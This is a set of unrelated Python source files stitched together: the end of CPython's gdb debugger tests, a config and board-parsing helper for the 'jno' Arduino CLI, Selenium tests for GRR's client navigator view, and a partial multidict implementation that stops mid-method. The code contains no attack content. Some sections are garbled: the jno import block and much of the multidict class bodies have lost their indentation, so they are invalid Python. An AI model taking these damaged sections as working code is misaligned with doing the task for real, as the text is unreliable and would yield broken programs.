                     "Python was compiled with optimizations")
    def test_printing_builtin(self):
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-print len'])
        self.assertMultilineMatches(bt,
                                    r".*\nbuiltin 'len' = <built-in function len>\n.*")
class PyLocalsTests(DebuggerTests):
    """Tests for the "py-locals" command (dumping a frame's local variables)."""

    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_basic_command(self):
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-locals'])
        self.assertMultilineMatches(bt,
                                    r".*\nargs = \(1, 2, 3\)\n.*")

    @unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_locals_after_up(self):
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-up', 'py-locals'])
        self.assertMultilineMatches(bt,
                                    r".*\na = 1\nb = 2\nc = 3\n.*")
def test_main():
    # Echo the gdb version when regrtest runs in verbose mode, to aid
    # debugging of buildbot failures.
    if test_support.verbose:
        print("GDB version %s.%s:" % (gdb_major_version, gdb_minor_version))
        for line in gdb_version.splitlines():
            print(" " * 4 + line)
    run_unittest(PrettyPrintTests,
                 PyListTests,
                 StackNavigationTests,
                 PyBtTests,
                 PyPrintTests,
                 PyLocalsTests
                 )
# Standard test-module entry point.
if __name__ == "__main__":
    test_main()
| |
import os
import sys
import re
import shutil
import subprocess
try:
import serial.tools.list_ports
except ImportError:
list_ports_supported = False
else:
list_ports_supported = True
from sys import platform
from shutil import rmtree
from collections import OrderedDict, namedtuple
from colorama import Fore
# Parameters to be included in .jno
valid_params = {
    'exec_dir',
    'board',
    'port',
    'baudrate',
    'sketch_dir'
}

# Global jno settings file name (stored in the current user's home directory)
global_file_name = ".jnoglobal.jno"
# Exception class for jno-related exceptions
class JnoException(Exception):
    """Raised for jno-specific configuration and usage errors."""
    pass
# Replaces temporary dictionary values with actual values
def interpret_configs():
    """Load global + local .jno configs and resolve placeholder values.

    Returns the config dict with exec_dir/sketch_dir resolved and the
    derived EXEC_SCRIPT, SKETCH_INO and SKETCH_LIBS paths filled in.

    Raises JnoException when exec_dir cannot be determined.
    """
    jno_dict = read_configs(get_home_directory(), global_file_name)
    # based on operating system, try to use a default location if no exec_dir is set
    if jno_dict["exec_dir"] in ('NULL', 'DEFAULT'):
        if os.name == 'nt':  # running on Windows
            if os.path.isdir("C:/Program Files (x86)/Arduino"):
                jno_dict["exec_dir"] = "C:/Program Files (x86)/Arduino"
        elif platform == "darwin":  # running on OS X
            if os.path.isdir("/Applications/Arduino.app"):
                jno_dict["exec_dir"] = "/Applications/Arduino.app"
    # otherwise, if still don't have a value, raise exception
    if jno_dict["exec_dir"] in ('NULL', 'DEFAULT'):
        raise JnoException("exec_dir has not been initialized (use jno setglobal --exec_dir=[Installed Arduino Directory])")
    # perform necessary additions/replacements
    if jno_dict["sketch_dir"] == 'DEFAULT':
        jno_dict["sketch_dir"] = os.getcwd()
    # if not an absolute path, anchor it at the current directory.
    # os.path.isabs() also recognizes Windows drive paths (e.g. "C:\\..."),
    # which the previous startswith('/') check did not.
    elif not os.path.isabs(jno_dict["sketch_dir"]):
        jno_dict["sketch_dir"] = os.path.join(os.getcwd(), jno_dict["sketch_dir"])
    # create EXEC_SCRIPT; if on Windows, use the console-friendly executable
    if os.name == 'nt':
        jno_dict["EXEC_SCRIPT"] = os.path.join(jno_dict["exec_dir"], 'arduino_debug')
    elif platform == "darwin":  # if on OS X, use proper executable directory
        jno_dict["EXEC_SCRIPT"] = os.path.join(jno_dict["exec_dir"], "Contents/MacOS/Arduino")
    else:
        jno_dict["EXEC_SCRIPT"] = os.path.join(jno_dict["exec_dir"], "arduino")
    # create SKETCH_INO
    jno_dict["SKETCH_INO"] = os.path.join(jno_dict["sketch_dir"], 'sketch/sketch.ino')
    # create SKETCH_LIBS
    jno_dict["SKETCH_LIBS"] = os.path.join(jno_dict["sketch_dir"], 'libraries')
    return jno_dict
# Verify that exec_dir is pointing at a valid arduino
def verify_arduino_dir(jno_dict):
    """Raise JnoException unless jno_dict['exec_dir'] looks like an Arduino install."""
    exec_dir = jno_dict["exec_dir"]
    if not os.path.isdir(exec_dir):
        raise JnoException("specified exec_dir is not a valid directory: {}".format(exec_dir))
    # the OS X app bundle keeps revisions.txt under Contents/Java
    relative = "Contents/Java/revisions.txt" if platform == "darwin" else "revisions.txt"
    revision_file = os.path.join(exec_dir, relative)
    if not os.path.exists(revision_file):
        raise JnoException("specified exec_dir is not pointing at a valid arduino install: {}".format(exec_dir))
# Create global settings in home directory if not created already
def create_global_settings():
    """Ensure the per-user global .jno settings file exists."""
    home = get_home_directory()
    if not os.path.exists(os.path.join(home, global_file_name)):
        create_default_jno_file(home, global_file_name)
# Write default jno file in desired location
def create_default_jno_file(location, file_name):
    """Write a jno settings file populated with the default parameters."""
    defaults = (
        "exec_dir==NULL\n"
        "board==uno\n"
        "baudrate==9600\n"
        "port==DEFAULT\n"
        "sketch_dir==DEFAULT\n"
    )
    with open(os.path.join(location, file_name), 'w') as jno:
        jno.write(defaults)
# Parses global and local .jno, returning dictionary
def read_configs(global_location, file_name):
    """Read the global .jno file, then overlay a local jno.jno if present."""
    jno_dict = parse_jno_file({}, global_location, file_name)
    local_dir = os.getcwd()
    if os.path.exists(os.path.join(local_dir, "jno.jno")):
        jno_dict = parse_jno_file(jno_dict, local_dir)
    return jno_dict
# Parses .jno file in given directory, returning dictionary
def parse_jno_file(jno_dict, jno_dir, file_name="jno.jno"):
    """Parse a .jno settings file and merge it into jno_dict.

    Lines have the form ``param==value``.  Unknown parameters and
    malformed lines are ignored.  A parsed 'NULL'/'DEFAULT' placeholder
    never overwrites an existing concrete value already in jno_dict.

    Returns the (mutated) jno_dict.
    """
    new_dict = {}
    with open(os.path.join(jno_dir, file_name), 'r') as jno:
        for line in jno:
            line = line.strip()
            if len(line) == 0:
                continue
            # split only on the FIRST '==' so values may themselves
            # contain '=='; the old unbounded split raised ValueError
            parts = line.split('==', 1)
            if len(parts) != 2:
                # malformed line (no '=='): skip instead of crashing
                continue
            param, conf_input = parts
            param = param.lower()
            if param in valid_params:
                new_dict[param] = conf_input
    for key in new_dict:
        # placeholder values must not clobber an existing real setting
        if key in jno_dict and new_dict[key] in ('NULL', 'DEFAULT'):
            continue
        jno_dict[key] = new_dict[key]
    return jno_dict
# Cleans selected directory
def clean_directory(dir_to_clean):
    """Remove and recreate dir_to_clean, leaving it empty.

    Returns True on success, False when removal or recreation failed.
    """
    # if exists, remove and replace
    if os.path.isdir(dir_to_clean):
        try:
            rmtree(dir_to_clean)
        except OSError:
            # narrowed from a bare except, which also swallowed
            # KeyboardInterrupt/SystemExit
            return False
    # in either case, make the directory again
    try:
        os.mkdir(dir_to_clean)
    except OSError:
        return False
    return True
# Run arduino with an assembled argument list
def run_arduino_process(arg_list):
    """Run the Arduino CLI, filtering noisy log lines from its stderr.

    Prints a colorized summary line based on the process return code.
    """
    try:
        call = subprocess.Popen(arg_list, stderr=subprocess.PIPE, universal_newlines=True)
    except OSError as e:
        # Previously a failed launch escaped the except clause (Popen never
        # raises CalledProcessError) and then crashed with NameError on
        # 'call' at the summary print below.
        print(Fore.RED + 'Could not launch arduino: {}'.format(e) + Fore.RESET)
        return
    for line in call.stderr:
        # drop java-logger noise: lines starting with a level...
        if line.startswith("TRACE") or line.startswith("DEBUG") or line.startswith("INFO"):
            continue
        # ...and timestamped lines whose level sits at columns 25-28
        elif line[25:29] == "INFO" or line[25:29] == "WARN":
            continue
        else:
            sys.stdout.write(line)
    # wait until call is finished
    call.communicate()
    print(Fore.YELLOW + 'All Actions Complete: {}'.format(return_code_qualifier(call.returncode)) + Fore.RESET)
# Returns meaning of return code
def return_code_qualifier(return_code):
    """Map an Arduino CLI return code to a colorized human-readable string."""
    return_code_dict = {
        0: Fore.GREEN + "Success",
        1: Fore.RED + "Build failed or upload failed",
        2: Fore.RED + "Sketch not found",
        3: Fore.RED + "Invalid argument for commandline option",
        4: Fore.RED + "Preference passed to --get-pref does not exist"
    }
    # Unknown codes (e.g. negative values when the process is killed by a
    # signal) previously raised KeyError; report them instead.
    return return_code_dict.get(
        return_code, Fore.RED + "Unknown return code: {}".format(return_code))
# Create directory for building
def create_build_directory(jno_dict):
    """Ensure <sketch_dir>/.build exists; migrate a legacy 'lib' dir to 'libraries'."""
    sketch_dir = jno_dict["sketch_dir"]
    build_dir = os.path.join(sketch_dir, ".build")
    if not os.path.isdir(build_dir):
        os.mkdir(build_dir)
    # while we are at it, check if library directory has the right name
    legacy_lib_dir = os.path.join(sketch_dir, "lib")
    current_lib_dir = os.path.join(sketch_dir, "libraries")
    if os.path.isdir(legacy_lib_dir):
        os.rename(legacy_lib_dir, current_lib_dir)
# Get home directory of current user
def get_home_directory():
	"""Return the expanded home directory path of the current user."""
	return os.path.expanduser('~')
# Returns list of common parameters needed for upload/build
def get_common_parameters(jno_dict):
	"""Build the repeated '--pref' argument pairs shared by upload and build calls."""
	# we are trying to set the build and sketchbook path
	sketchbook_path = jno_dict["sketch_dir"]
	build_path = os.path.join(sketchbook_path, ".build")
	prefs = [
		"build.path={}".format(build_path),
		"sketchbook.path={}".format(sketchbook_path),
	]
	argument_list = []
	for pref in prefs:
		argument_list.extend(["--pref", pref])
	return argument_list
# Get all ports to connected devices
def get_all_ports():
	"""Return pyserial's port list, or None when listing is unsupported."""
	if not list_ports_supported:
		print("port listing is not supported with current version of pyserial")
		return None
	return serial.tools.list_ports.comports()
# Get first port name
def get_first_port_name():
	"""Return the device name of the first detected serial port, else None."""
	ports = get_all_ports()
	return ports[0].device if ports else None
# Check if port exists; if default, use first available port
def verify_and_get_port(port_name, use_first=True):
	"""Validate port_name against connected ports.

	"DEFAULT" selects the first available port when use_first is set.
	Returns the verified port name, or None when no match exists.
	"""
	if port_name == "DEFAULT":
		return get_first_port_name() if use_first else None
	matches = [port.device for port in get_all_ports() if port.device == port_name]
	return port_name if matches else None
# Get and print list of all supported models
def get_all_models(jno_dict):
	"""Collect Model entries from every boards.txt under the arduino hardware dir.

	Walks <exec_dir>/hardware (or the OS X app-bundle path), skipping the
	'tools' directory, and parses each vendor/architecture subdirectory.
	"""
	# directores to ignore
	ignore_dirs = ["tools"]
	# get hardware directory
	# NOTE(review): 'platform' is compared against a string, which assumes
	# 'from sys import platform' at file level -- confirm the import; the
	# stdlib *module* 'platform' would never equal "darwin".
	if platform == "darwin": # if running on a OS X
		arduino_hardware_dir = os.path.join(jno_dict["exec_dir"],"Contents/Java/hardware")
	else: # running on all other platforms
		arduino_hardware_dir = os.path.join(jno_dict["exec_dir"],"hardware")
	# used to store all models
	all_models = []
	# do a walk
	directories = next(os.walk(arduino_hardware_dir))[1]
	for directory in directories:
		# if not an ignored dir, go into it
		if directory not in ignore_dirs:
			directory_path = os.path.join(arduino_hardware_dir,directory)
			subdirectories = next(os.walk(directory_path))[1]
			# in each directory here, go into it and do a get_boards... call
			for subdir in subdirectories:
				subdir_path = os.path.join(directory_path, subdir)
				# "vendor:arch:" prefix later used to build fqbn-style names
				path_prefix = "{}:{}:".format(directory,subdir)
				all_models.extend(get_boards_from_directory(subdir_path,path_prefix))
	#arduino_hardware_dir = os.path.join(jno_dict["exec_dir"],"hardware/arduino/avr/")
	return all_models
# Returns model list from boards.txt in specified directory
def get_boards_from_directory(fileloc,prefix):
	"""Parse <fileloc>/boards.txt into a list of Model objects.

	boards.txt starts with 'menu.<type>=<label>' declarations, followed by
	per-board entries ('<board>.name=...' plus '<board>.menu.<type>.<name>=
	<label>' lines). prefix (e.g. "vendor:arch:") is attached to each Model.
	"""
	# models is a list of Model classes
	models = []
	with open(os.path.join(fileloc,"boards.txt"),'r') as modelfile:
		still_expecting_menu_item_types = True
		# list for expected menu item types [(menu_item_type, menu_item_label), ...]
		expected_menu_item_types = []
		# keep track of current board info
		current_model = Model()
		for line in modelfile:
			# strip the line
			line = line.strip()
			# skip empty lines
			if len(line) == 0:
				continue
			# at the beginning of the file, we expect to see all the possible menu item types. Collect them
			if still_expecting_menu_item_types and current_model.board is None:
				menu_type_search_object = re.search("menu.[a-zA-Z0-9_-]*=(.*)", line)
				if menu_type_search_object is not None:
					# get menu item type + readable label
					expected_type_label,expected_readable_label = menu_type_search_object.group(0).split("=")
					expected_type_label = expected_type_label.split(".")[1]
					expected_menu_item_types.append((expected_type_label, expected_readable_label))
					continue
			# check if line depicts board name
			if ".name=" in line:
				# this is not a new menu item type line, so set expectation to False
				if still_expecting_menu_item_types:
					still_expecting_menu_item_types = False
				arduino_label,readable_label = line.strip().split(".name=")
				# check if we are on a different type of board now
				if current_model.board is not None and arduino_label != current_model.board:
					models.append(current_model)
					current_model = Model()
				# change the current labels
				current_model.board = arduino_label
				current_model.board_name = readable_label
				current_model.initialize_dict(expected_menu_item_types)
				current_model.set_prefix(prefix)
			# see if it is a different skew of current board type
			elif current_model.board is not None:
				search_object = re.search(current_model.board+".menu.[a-zA-Z0-9_-]*.[a-zA-Z0-9_-]*=(.*)", line)
				if search_object is not None:
					# figure out which menu type we got
					menu_item_type,menu_item_label = search_object.group(0).split("=")
					menu_item_type,menu_item_name = menu_item_type.split(".")[-2:]
					# add this menu_item_type + label to the proper item in current_menu_items
					current_model.add_menu_item(menu_item_type,menu_item_name,menu_item_label)
		# add last entry (the loop only appends a board when the next one starts)
		if current_model.board is not None:
			models.append(current_model)
			current_model = Model()
	return models
# Get help string for command
def formatted_help_string(command, surround=False):
	"""Render the colorized help blurb for *command*; surround adds '=' fences."""
	top = Fore.CYAN + "======================\n" if surround else ""
	bottom = Fore.CYAN + "\n======================" if surround else ""
	template = """{8}{3}{0}:
	{4}Usage:{6} {1}
	{4}Description:{5} {2}{9}{7}"""
	return template.format(
		command.help_name, command.help_usage, command.help_description,
		Fore.YELLOW, Fore.CYAN, Fore.MAGENTA, Fore.GREEN, Fore.RESET,
		top, bottom)
# A named tuple used to represent a specific menu item (internal name + label)
MenuItem = namedtuple("MenuItem", "name label")
# ModelData that is used to store label and all the subitems
class ModelData(object):
	"""Pairs a human-readable menu label with its collected menu items."""

	def __init__(self, label):
		self.label = label
		self.items = []
		self.empty = True

	def is_empty(self):
		"""True until the first item is appended."""
		return self.empty

	def append(self, item):
		"""Record *item* and mark the container as non-empty."""
		self.items.append(item)
		self.empty = False

	def get_first(self):
		"""Return the first stored item, or None when nothing was appended."""
		return self.items[0] if self.items else None

	def __str__(self):
		return "'ModelData with Label: {} and Items: {}'".format(self.label, self.items)

	def __repr__(self):
		return str(self)
# Model that stores data for a particular arduino board
class Model(object):
	"""Holds the identifiers, prefix and menu options parsed for one board."""

	def __init__(self):
		self.board = None
		self.board_name = None
		self.menu_item_dict = OrderedDict()
		self.empty = True
		self.argument_prefix = ""

	# initialize menu item dictionary
	def initialize_dict(self, expected_menu_list):
		"""Create an empty ModelData slot for every expected (type, label) pair."""
		for item_type, item_label in expected_menu_list:
			self.menu_item_dict[item_type] = ModelData(item_label)

	# check if there are no items added to the dictionary
	def is_empty(self):
		return self.empty

	# set and get prefix
	def set_prefix(self, prefix):
		self.argument_prefix = prefix

	def get_prefix(self):
		return self.argument_prefix

	# add a menu item for a particular type
	def add_menu_item(self, menu_item_type, menu_item_name, menu_item_label):
		"""File a MenuItem under its menu type and mark the model non-empty."""
		entry = MenuItem(menu_item_name, menu_item_label)
		self.menu_item_dict[menu_item_type].append(entry)
		self.empty = False

	def __str__(self):
		return "Model with board: {}, board_name: {}, and item dict: {}".format(
			self.board, self.board_name, self.menu_item_dict)

	def __repr__(self):
		return str(self)
| |
#!/usr/bin/env python
"""Navigator view tests."""
from grr.gui import gui_test_lib
from grr.gui import runtests_test
from grr.lib import aff4
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib.rdfvalues import client as rdf_client
class TestNavigatorView(gui_test_lib.SearchClientTestBase):
  """Tests for NavigatorView (left side bar)."""
  def CreateClient(self, last_ping=None):
    """Create an approved test client whose PING attribute is last_ping (now by default)."""
    if last_ping is None:
      last_ping = rdfvalue.RDFDatetime.Now()
    with self.ACLChecksDisabled():
      client_id = self.SetupClients(1)[0]
      with aff4.FACTORY.Open(
          client_id, mode="rw", token=self.token) as client_obj:
        client_obj.Set(client_obj.Schema.PING(last_ping))
      self.RequestAndGrantClientApproval(client_id)
    # NOTE(review): the result of this re-open is unused; presumably it
    # refreshes the AFF4 cache -- confirm before removing.
    client_obj = aff4.FACTORY.Open(client_id, token=self.token)
    return client_id
  def RecordCrash(self, client_id, timestamp):
    """Run a crashing flow against client_id at the given (faked) time."""
    with test_lib.FakeTime(timestamp):
      client = test_lib.CrashClientMock(client_id, self.token)
      for _ in test_lib.TestFlowHelper(
          test_lib.FlowWithOneClientRequest.__name__,
          client,
          client_id=client_id,
          token=self.token,
          check_flow_errors=False):
        pass
  def CreateClientWithVolumes(self, available=50):
    """Create an approved client reporting one volume with *available* of 100 units free."""
    with self.ACLChecksDisabled():
      client_id = self.SetupClients(1)[0]
      with aff4.FACTORY.Open(
          client_id, mode="rw", token=self.token) as client_obj:
        volume = rdf_client.Volume(
            total_allocation_units=100,
            actual_available_allocation_units=available)
        client_obj.Set(client_obj.Schema.VOLUMES([volume]))
      self.RequestAndGrantClientApproval(client_id)
    # NOTE(review): result unused; presumably a cache refresh -- confirm.
    client_obj = aff4.FACTORY.Open(client_id, token=self.token)
    return client_id
  def testReasonIsShown(self):
    client_id = self.CreateClient()
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsTextPresent, "Access reason: " + self.token.reason)
  def testOnlineClientStatus(self):
    client_id = self.CreateClient()
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsElementPresent, "css=img[src$='online.png']")
  def testOneDayClientStatus(self):
    # A client that pinged an hour ago shows the "online within a day" icon.
    client_id = self.CreateClient(
        last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1h"))
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsElementPresent, "css=img[src$='online-1d.png']")
  def testOfflineClientStatus(self):
    client_id = self.CreateClient(
        last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1d"))
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsElementPresent, "css=img[src$='offline.png']")
  def testOnlineClientStatusInClientSearch(self):
    client_id = self.CreateClient()
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
                   "img[src$='online.png']" % client_id.Basename())
  def testOneDayClientStatusInClientSearch(self):
    client_id = self.CreateClient(
        last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1h"))
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
                   "img[src$='online-1d.png']" % client_id.Basename())
  def testOfflineClientStatusInClientSearch(self):
    client_id = self.CreateClient(
        last_ping=rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("1d"))
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
                   "img[src$='offline.png']" % client_id.Basename())
  def testLatestCrashesStatusIsNotDisplayedWhenThereAreNoCrashes(self):
    client_id = self.CreateClient()
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsTextPresent, "Host-0")
    self.WaitUntilNot(self.IsTextPresent, "Last crash")
  def testCrashIsDisplayedInClientStatus(self):
    timestamp = rdfvalue.RDFDatetime.Now()
    client_id = self.CreateClient(last_ping=timestamp)
    with self.ACLChecksDisabled():
      self.RecordCrash(client_id, timestamp - rdfvalue.Duration("5s"))
      self.RequestAndGrantClientApproval(client_id)
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsTextPresent, "Last crash")
    self.WaitUntilContains("seconds", self.GetText,
                           "css=grr-client-summary .last-crash")
  def testOnlyTheLatestCrashIsDisplayed(self):
    timestamp = rdfvalue.RDFDatetime.Now()
    client_id = self.CreateClient(last_ping=timestamp)
    with self.ACLChecksDisabled():
      # Two crashes recorded; only the 5-seconds-ago one should show.
      self.RecordCrash(client_id, timestamp - rdfvalue.Duration("2h"))
      self.RecordCrash(client_id, timestamp - rdfvalue.Duration("5s"))
      self.RequestAndGrantClientApproval(client_id)
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsTextPresent, "Last crash")
    self.WaitUntilContains("seconds", self.GetText,
                           "css=grr-client-summary .last-crash")
  def testOnlyCrashesHappenedInPastWeekAreDisplayed(self):
    timestamp = rdfvalue.RDFDatetime.Now()
    client_id = self.CreateClient(last_ping=timestamp)
    with self.ACLChecksDisabled():
      self.RecordCrash(client_id, timestamp - rdfvalue.Duration("8d"))
      self.RequestAndGrantClientApproval(client_id)
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsTextPresent, "Host-0")
    # This one is not displayed, because it happened more than a week ago.
    self.WaitUntilNot(self.IsTextPresent, "Last crash")
  def testCrashIconDoesNotAppearInClientSearchWhenClientDidNotCrash(self):
    client_id = self.CreateClient()
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    # There should be a result row with the client id.
    self.WaitUntil(self.IsElementPresent,
                   "css=tr:contains('%s')" % client_id.Basename())
    # But it shouldn't have the skull.
    self.WaitUntilNot(self.IsElementPresent, "css=tr:contains('%s') "
                      "img[src$='skull-icon.png']" % client_id.Basename())
  def testCrashIconDoesNotAppearInClientSearchIfClientCrashedLongTimeAgo(self):
    client_id = self.CreateClient()
    with self.ACLChecksDisabled():
      self.RecordCrash(client_id,
                       rdfvalue.RDFDatetime.Now() - rdfvalue.Duration("25h"))
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    # There should be a result row with the client id.
    self.WaitUntil(self.IsElementPresent,
                   "css=tr:contains('%s')" % client_id.Basename())
    # But it shouldn't have the skull.
    self.WaitUntilNot(self.IsElementPresent, "css=tr:contains('%s') "
                      "img[src$='skull-icon.png']" % client_id.Basename())
  def testCrashIconAppearsInClientSearchIfClientCrashedRecently(self):
    timestamp = rdfvalue.RDFDatetime.Now()
    client_id = self.CreateClient()
    with self.ACLChecksDisabled():
      self.RecordCrash(client_id, timestamp)
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    # There should be a result row with the client id.
    self.WaitUntil(self.IsElementPresent,
                   "css=tr:contains('%s')" % client_id.Basename())
    # And it should have the skull.
    self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
                   "img[src$='skull-icon.png']" % client_id.Basename())
  def testDiskIconDoesNotAppearInClientSearchIfDiskIsNotFull(self):
    client_id = self.CreateClientWithVolumes()
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    # There should be a result row with the client id.
    self.WaitUntil(self.IsElementPresent,
                   "css=tr:contains('%s')" % client_id.Basename())
    # But it shouldn't have the disk icon.
    self.WaitUntilNot(self.IsElementPresent, "css=tr:contains('%s') "
                      "img[src$='hdd-bang-icon.png']" % client_id.Basename())
  def testDiskIconDoesAppearsInClientSearchIfDiskIsFull(self):
    client_id = self.CreateClientWithVolumes(available=1)
    self.Open("/")
    self.Type("client_query", client_id.Basename())
    self.Click("client_query_submit")
    # There should be a result row with the client id.
    self.WaitUntil(self.IsElementPresent,
                   "css=tr:contains('%s')" % client_id.Basename())
    # With the disk icon.
    self.WaitUntil(self.IsElementPresent, "css=tr:contains('%s') "
                   "img[src$='hdd-bang-icon.png']" % client_id.Basename())
  def testDiskWarningIsNotDisplayed(self):
    client_id = self.CreateClientWithVolumes()
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsTextPresent, "Host-0")
    self.WaitUntilNot(self.IsTextPresent, "Disk free space")
  def testDiskWarningIsDisplayed(self):
    client_id = self.CreateClientWithVolumes(available=1)
    self.Open("/#c=" + str(client_id))
    self.WaitUntil(self.IsTextPresent, "Host-0")
    self.WaitUntil(self.IsTextPresent, "Disk free space")
def main(argv):
  """Entry point: run the full Selenium test suite via the GRR test runner."""
  # Run the full test suite
  runtests_test.SeleniumTestProgram(argv=argv)
if __name__ == "__main__":
  flags.StartMain(main)
| |
"""Multidict implementation.
HTTP Headers and URL query string require specific data structure:
multidict. It behaves mostly like a dict but it can have
several values for the same key.
"""
from builtins import str
__all__ = ('MultiDict', 'MultiDictProxy', 'CIMultiDict')
_marker = object()
class _Base(object):
isCI = False
def getall(self, key, default=_marker):
"""Return a list of all values matching the key."""
res = [v for k, v in self._items if k == key]
if res:
return res
if not res and default is not _marker:
return default
raise KeyError('Key not found: %r' % key)
def getone(self, key, default=_marker):
"""Get first value matching the key."""
for k, v in self._items:
if k == key:
return v
if default is not _marker:
return default
raise KeyError('Key not found: %r' % key)
# Mapping interface #
def __getitem__(self, key):
return self.getone(key, _marker)
def get(self, key, default=None):
"""Get first value matching the key.
The method is alias for .getone().
"""
return self.getone(key, default)
def __iter__(self):
return iter(self.keys())
def __len__(self):
return len(self._items)
def keys(self):
"""Return a new view of the dictionary's keys."""
return _KeysView(self._items, isCI=self.isCI)
def items(self):
"""Return a new view of the dictionary's items *(key, value) pairs)."""
return _ItemsView(self._items)
def values(self):
"""Return a new view of the dictionary's values."""
return _ValuesView(self._items)
def __eq__(self, other):
if not isinstance(other, (_Base, dict)):
return NotImplemented
if isinstance(other, _Base):
return sorted(self._items) == sorted(other._items)
for k, v in self.items():
nv = other.get(k if not self.isCI else k.upper(), _marker)
if v != nv:
return False
return True
def __contains__(self, key):
for k, v in self._items:
if k == key:
return True
return False
def __repr__(self):
body = ', '.join("'{}': {!r}".format(k, v) for k, v in self.items())
return '<{}({})>'.format(self.__class__.__name__, body)
class _CIBase(_Base):
    """Case-insensitive read-only mixin: every lookup upper-cases its key.

    Relies on writers (see CIMultiDict) storing keys already upper-cased.
    """
    # Views consult this flag to upper-case keys during set comparisons.
    isCI = True
    def getall(self, key, default=_marker):
        """Return a list of all values matching the key."""
        return super(_CIBase, self).getall(key.upper(), default)
    def getone(self, key, default=_marker):
        """Get first value matching the key."""
        return super(_CIBase, self).getone(key.upper(), default)
    def get(self, key, default=None):
        """Get first value matching the key.

        The method is alias for .getone().
        """
        return super(_CIBase, self).get(key.upper(), default)
    def __getitem__(self, key):
        return super(_CIBase, self).__getitem__(key.upper())
    def __contains__(self, key):
        return super(_CIBase, self).__contains__(key.upper())
class MultiDictProxy(_Base):
    """Read-only facade over a MultiDict, sharing its underlying storage."""

    def __init__(self, arg):
        if not isinstance(arg, MultiDict):
            msg = 'MultiDictProxy requires MultiDict instance, not {}'
            raise TypeError(msg.format(type(arg)))
        # Share (not copy) the storage so the proxy tracks later mutations.
        self._items = arg._items

    def copy(self):
        """Return a copy of itself."""
        return MultiDict(self.items())
class CIMultiDictProxy(_CIBase, MultiDictProxy):
    """Read-only, case-insensitive facade over a CIMultiDict."""

    def __init__(self, arg):
        if not isinstance(arg, CIMultiDict):
            msg = 'CIMultiDictProxy requires CIMultiDict instance, not {}'
            raise TypeError(msg.format(type(arg)))
        # Share (not copy) the storage so the proxy tracks later mutations.
        self._items = arg._items

    def copy(self):
        """Return a copy of itself."""
        return CIMultiDict(self.items())
class MultiDict(_Base):
    """Ordered, mutable multidict: a key may be stored with several values."""
    def __init__(self, *args, **kwargs):
        # Storage: a flat list of (key, value) tuples in insertion order.
        self._items = []
        self._extend(args, kwargs, self.__class__.__name__, self.add)
    def add(self, key, value):
        """Add the key and value, not overwriting any previous value."""
        self._items.append((key, value))
    def copy(self):
        """Return a copy of itself."""
        cls = self.__class__
        return cls(self.items())
    def extend(self, *args, **kwargs):
        """Extend current MultiDict with more values.
        This method must be used instead of update.
        """
        self._extend(args, kwargs, 'extend', self.add)
    def _extend(self, args, kwargs, name, method):
        # Shared ingestion helper: 'method' is self.add (keeps duplicates)
        # for __init__/extend, or self._replace (overwrites) for update.
        if len(args) > 1:
            raise TypeError("{} takes at most 1 positional argument"
                            " ({} given)".format(name, len(args)))
        if args:
            arg = args[0]
            if isinstance(args[0], MultiDictProxy):
                items = arg._items
            elif isinstance(args[0], MultiDict):
                items = arg._items
            elif hasattr(arg, 'items'):
                items = arg.items()
            else:
                # Assume an iterable of (key, value) pairs; validate eagerly.
                for item in arg:
                    if not len(item) == 2:
                        raise TypeError(
                            "{} takes either dict or list of (key, value) "
                            "tuples".format(name))
                items = arg
            for key, value in items:
                method(key, value)
        for key, value in kwargs.items():
            method(key, value)
    def clear(self):
        """Remove all items from MultiDict."""
        self._items = []
    # Mapping interface #
    def __setitem__(self, key, value):
        self._replace(key, value)
    def __delitem__(self, key):
        # Deletes *every* pair stored under key; iterating backwards keeps
        # pending indices valid while elements are removed.
        items = self._items
        found = False
        for i in range(len(items) - 1, -1, -1):
            if items[i][0] == key:
                del items[i]
                found = True
        if not found:
            raise KeyError(key)
    def setdefault(self, key, default=None):
        """Return value for key, set value to default if key is not present."""
        for k, v in self._items:
            if k == key:
                return v
        self._items.append((key, default))
        return default
    def pop(self, key, default=_marker):
        """Remove specified key and return the corresponding value.
        If key is not found, d is returned if given, otherwise
        KeyError is raised.
        """
        # Removes every occurrence of key; because the scan runs backwards,
        # 'value' ends up holding the earliest-inserted occurrence's value.
        value = None
        found = False
        for i in range(len(self._items) - 1, -1, -1):
            if self._items[i][0] == key:
                value = self._items[i][1]
                del self._items[i]
                found = True
        if not found:
            if default is _marker:
                raise KeyError(key)
            else:
                return default
        else:
            return value
    def popitem(self):
        """Remove and return an arbitrary (key, value) pair."""
